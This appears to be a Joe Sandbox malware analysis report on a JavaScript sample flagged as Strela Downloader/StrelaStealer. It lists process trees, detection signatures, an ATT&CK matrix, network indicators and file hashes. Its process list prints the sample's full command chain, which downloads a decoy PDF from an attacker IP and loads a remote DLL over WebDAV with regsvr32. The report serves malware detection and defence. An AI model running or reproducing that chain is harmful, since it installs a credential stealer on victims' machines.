Windows
Analysis Report
3236235451745230764.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 7416 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\32362 3545174523 0764.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7468 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\247 8833882571 2.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7520 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 7704 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 7912 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 8148 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 00 --field -trial-han dle=1708,i ,937974983 7183083148 ,766559101 1407251023 ,131072 -- disable-fe atures=Bac kForwardCa che,Calcul ateNativeW inOcclusio n,WinUseBr owserSpell Checker /p refetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 7976 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer | ||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588688 |
Start date and time: | 2025-01-11 04:13:09 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 55s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 3236235451745230764.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/59@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 2.16.168.105, 2.16.168.107, 52.6.155.20, 52.22.41.97, 3.233.129.217, 3.219.243.226, 172.64.41.3, 162.159.61.3, 2.23.242.162, 23.209.209.135, 23.46.156.8, 23.46.156.13, 23.46.156.40, 23.46.156.29, 23.46.156.53, 23.46.156.4, 192.168.2.4, 52.149.20.212, 104.76.100.172, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
22:14:04 | API Interceptor | |
22:14:09 | API Interceptor | |
22:14:09 | API Interceptor | |
22:14:21 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073563216462527 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrA:KooCEYhgYEL0In |
MD5: | 3E000DD5DAEECD73CC6F7FE3059882EA |
SHA1: | 468D83306D27484396DC0352CECC262BBED04225 |
SHA-256: | 56E393E6127768C8C9E0B8EE1B1BFF2DD227764DFC0F22B3B9D8ADF0205FAA0A |
SHA-512: | 9AC864FBFC31FDF7CACB2A2C5541EA0DF9FC3C218AD50C733EB4A35A0AC87BCB2292BA9D4B4C171AE7DBD966F9AC2A6F1CE117F365938218EA661EE1F71DA979 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.42212597920162076 |
Encrypted: | false |
SSDEEP: | 1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO |
MD5: | 546C1C57115DB04062000198202D934C |
SHA1: | AB51CDC7D3E455356939362C5DAC61DA7C07AAB1 |
SHA-256: | 47E9BA5E88FA2AD310B93D08939AF4D99A263C29E4063656269C70B43D4075EE |
SHA-512: | 04D14A53A24A8B6D174F586BD8712BDD36C96B9834A636E9CCDBE5C3B880644BEB2AFADF66B2B966FF58647A739E4BC1AC89DEC56E318809BF508954ACB0F0E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07698397306953877 |
Encrypted: | false |
